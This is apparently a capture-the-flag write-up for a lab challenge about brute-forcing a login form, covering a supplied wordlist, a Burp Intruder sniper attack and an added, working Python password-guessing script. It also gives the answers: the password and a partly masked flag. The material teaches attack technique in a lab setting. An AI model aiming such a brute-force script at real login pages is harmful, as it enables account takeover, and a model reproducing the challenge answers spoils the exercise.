# \[Day 4] Santa's Running Behind

## Challenge

Accessing the site reveals a login form as shown below.

![](/files/sdQamYK8eWzc7607AjS2)

The following password list was provided with the challenge.

```
christmas
elves!
santa
festive
joy123
myrrh!
yuletide
presents
candy
tidings
cookie
cookies
biscuits!
snowball
snowball123
```

First, capture a dummy login request in Burp and send it to Intruder.

![](/files/f5fvNMxEdN83BTwK3TZd) ![](/files/fWbe9XMYouHlLOwNonZv)

Mark the payload positions as shown below.

![](/files/edOVJavcBZR9i3T6SYVy)

Paste the given wordlist into Payload set 1 (the attack type is Sniper, since only the password position varies) and start the attack.

![](/files/MC3LkgCYHbIuEs4Cz5rC)

After the attack has completed, sort the results by the Status or Length column. Every failed attempt returns `200` with the login page re-rendered, while exactly one request stands out with a longer response and a status code of `302`, i.e. a redirect: the server accepted the credentials and sent the browser on to the next page.

![](/files/CLQiaXINf7BfIdUSpQkt)

Trying to login with `santa:cookie` succeeds and we are able to see Santa's Itinerary.
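The same attack can be scripted instead of clicked through in Intruder, which is handy when the Community edition throttles the attack or the wordlist grows. The script below is an added example, not part of the original write-up or the THM room: it POSTs each candidate password for one username, records `(status, body length)` per attempt, and flags the response that differs from the majority, which is the signal the write-up spots visually (one `302` among the `200`s). The form field names `username`/`password`, the `/login` path and the host address are assumptions not confirmed by the page, and `fake_target` is a constructed stand-in for the challenge server so the example runs offline; point `brute_force` at `post_login` for a real target.

```python
"""Scripted equivalent of the Burp Intruder sniper attack (added example)."""
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter

# Wordlist exactly as given in the challenge.
WORDLIST = [
    "christmas", "elves!", "santa", "festive", "joy123", "myrrh!", "yuletide",
    "presents", "candy", "tidings", "cookie", "cookies", "biscuits!",
    "snowball", "snowball123",
]


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the 302 itself stays observable."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def post_login(url, username, password, timeout=5):
    """Send one login attempt and return (status_code, body_length).

    Field names `username`/`password` are an assumption, not taken from the page.
    """
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as e:
        # With NoRedirect installed, 3xx (and 4xx/5xx) land here instead of being followed.
        return e.code, len(e.read() or b"")


def find_outliers(results):
    """Return passwords whose (status, length) signature differs from the most common one.

    This mirrors eyeballing Intruder's Status/Length columns: the failed attempts
    share one signature, the hit does not. An empty or uniform result set yields [].
    """
    if not results:
        return []
    baseline, _ = Counter(results.values()).most_common(1)[0]
    return [pw for pw, sig in results.items() if sig != baseline]


def brute_force(url, username, wordlist, send=post_login):
    """Try every password for `username`; return ({password: (status, length)}, outliers)."""
    results = {pw: send(url, username, pw) for pw in wordlist}
    return results, find_outliers(results)


def fake_target(url, username, password):
    """Constructed stand-in for the challenge server so the example runs offline."""
    if username == "santa" and password == "cookie":
        return 302, 0          # redirect to the itinerary, empty body
    return 200, 1423           # login page re-rendered with an error message


if __name__ == "__main__":
    # Swap send=fake_target for send=post_login (the default) against a live target.
    results, hits = brute_force("http://10.10.10.10/login", "santa", WORDLIST, send=fake_target)
    for pw, (status, length) in results.items():
        print(f"{status} {length:5d} {pw}")
    print("candidates:", hits)
```

Checking for an outlier rather than hard-coding "302 means success" keeps the check useful against applications that signal a valid login differently (a `200` with a much larger body, or a `Set-Cookie` header), and the `NoRedirect` handler matters because a client that silently follows the redirect would report the destination page's status instead of the `302`.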

{% hint style="success" %}
What valid password can you use to access the "santa" account?

* cookie
{% endhint %}

![](/files/vDvyfKkTxGXGNv4DT9Cv)

{% hint style="success" %}
What is the flag in Santa's itinerary?

* THM{SANTA\_\*\*\*\*\*\*\*}
{% endhint %}
